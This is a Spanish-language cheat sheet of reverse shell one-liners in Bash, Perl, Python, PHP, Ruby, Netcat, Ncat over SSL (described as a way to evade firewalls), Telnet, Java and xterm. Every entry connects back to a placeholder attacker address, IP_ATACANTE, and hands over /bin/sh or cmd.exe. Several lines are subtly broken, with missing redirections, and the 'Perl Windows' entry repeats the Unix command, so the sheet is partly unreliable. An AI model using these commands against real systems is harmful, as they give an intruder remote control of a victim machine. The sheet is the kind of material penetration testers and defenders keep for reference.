\   /\          __    _____        _____     _____ _ _____
)  ( ')        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
(  /  )        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
 \(__)|        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|

 
 Aqui teneis una cheatsheet de Reverse Shells.

Bash
----

bash -i >& /dev/tcp/IP_ATACANTE/PUERTO 0>&1
exec 5<>/dev/tcp/IP_ATACANTE/PUERTO;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0&0 2>&0
0<&196;exec 196<>/dev/tcp/IP_ATACANTE/PUERTO; sh <&196 >&196 2>&196
Perl ----
perl -e 'use Socket;$i="IP_ATACANTE";$p=PUERTO;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows ------------
perl -e 'use Socket;$i="IP_ATACANTE";$p=PUERTO;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"IP_ATACANTE:PUERTO");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python ------
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ATACANTE",PUERTO));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP ---
php -r '$sock=fsockopen("IP_ATACANTE",PUERTO);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("IP_ATACANTE",PUERTO);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("IP_ATACANTE",PUERTO);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$s=fsockopen("IP_ATACANTE",PUERTO);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("IP_ATACANTE",PUERTO);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Ruby ----
ruby -rsocket -e'f=TCPSocket.open("IP_ATACANTE",PUERTO).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat ------
nc -e /bin/sh IP_ATACANTE PUERTO #En la victima
nc -nlvp PUERTO #En el atacante
/bin/sh | nc IP_ATACANTE PUERTO
rm -f /tmp/p; mknod /tmp/p p && nc IP_ATACANTE PUERTO 0/tmp/p
Ncat SSL (Usado para evadir firewalls). ---------------------------------------
ncat --exec cmd.exe --allow IP_ATACANTE -vnl PUERTO --ssl #En la victima
ncat -v IP_VICTIMA PUERTO --ssl #En el atacante
Telnet ------
rm -f /tmp/p; mknod /tmp/p p && telnet IP_ATACANTE PUERTO 0/tmp/p
telnet IP_ATACANTE 4444 | /bin/bash | telnet IP_ATACANTE 4445 #En este ejemplo habria que poner nc en escucha en el puerto 4445.
Java ----
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ATACANTE/PUERTO;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm -----
Xnest :1 #Ejecutar en Atacante
xhost +VICTIMA_IP #Ejecutar en Atacante
xterm -display IP_ATACANTE:1 # Ejecutar en victima